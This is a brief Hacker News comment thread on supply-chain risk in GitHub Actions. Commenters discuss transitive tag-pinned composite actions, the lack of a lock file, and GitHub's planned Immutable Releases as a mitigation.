alt Hacker NewsGitHub Actions doesn't have a lock file, so your repo is still prone to transitive attacks if the SHA-locked actions you use also happen to use other composite actions by tags, which could be compromised in the future.
Replies
Munksgaard • today at 6:38 PM
Even with a lock file, the action can download and execute arbitrary code from the internet.
➕ show 1 reply
Agreed. Good news is GitHub will address that with Immutable Releases https://github.blog/news-insights/product-news/whats-coming-... You won't even need to use commit SHA as long as the maintainer follows this approach.